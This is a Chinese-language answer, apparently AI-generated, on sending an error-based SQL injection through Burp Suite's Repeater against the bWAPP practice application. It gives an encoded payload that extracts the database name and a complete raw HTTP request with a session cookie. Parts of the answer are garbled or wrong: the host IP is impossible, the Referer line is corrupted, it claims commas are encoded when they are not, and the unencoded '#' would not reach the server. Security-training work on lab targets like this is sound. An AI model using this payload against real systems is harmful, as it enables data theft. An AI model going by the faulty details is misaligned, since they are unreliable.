引自免费微信小程序:皆我百晓生
看起来你在尝试使用 Burp Suite 进行 SQL 注入测试,但在 Burp 中设置注入字符串时遇到了问题。从提供的截图来看,问题可能出在特殊字符编码上。当包含特殊字符(如单引号、空格、分号等)的查询被发送到 Burp 时,它可能会对其进行 URL 编码,导致请求格式错误。
为了正确地发送这个注入语句,你需要确保所有特殊字符都被正确地转义并进行适当的 URL 编码。下面是处理这个问题的步骤:
- 在 Burp 的 Repeater 工具中,找到你要发送的请求。
- 清除原有的 title 参数,然后手动输入以下编码后的 SQL 注入语句:
%27%20union%20select%201,2,3,4,count%28*%29,concat%28%28select%20database%28%29%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%20#
这里的每个字符都进行了 URL 编码。例如,单引号 %27,空格 %20,逗号 %2C 等。
- 确保其他参数(如
action)保持不变,并且在提交之前检查请求头中的Content-Type设置为application/x-www-form-urlencoded,这是大多数表单提交使用的默认类型。
如果你按照上述步骤操作,应该能在 Burp 中成功发送这个注入请求。然而,要注意的是,由于 Burp 可能会自动解码和重新编码请求,有时候手动编码可能会被覆盖。在这种情况下,可以考虑使用 Burp 的 "Encoder" 功能来处理注入字符串。
以下是手动编码后的请求示例,可以直接复制到 Burp Repeater 的 Raw 模式中:
GET /bWAPP/bWAPP-master/app/sqli_1.php?title=%27%20union%20select%201,2,3,4,count%28*%29,concat%28%28select%20database%28%29%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%20#&action=search HTTP/1.1
Host: 10.31.164.630
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/sigmed-exchange;v=b3;q=0.7
Referer: http:///bWAPP/bWAPP-master/app/sqli_1.php?title=1*27+select+union+select+1$2c212c312c4:2C5¥2C6$EF$BC$8C7+--+&action=search
Accept-Encoding: gzip, deflate, br
Accept-Language:zh-CN,zh;q=0.9
Cookie: PHPSESSID=qdmilojtokDerqfmig7gur7n46; security level=0
执行这个请求后,你应该能看到与在浏览器中相同的响应结果。如果你仍然遇到问题,可能是 Burp 对请求进行了额外的处理,建议尝试使用 Burp 的 Encoder 工具来编码注入字符串。
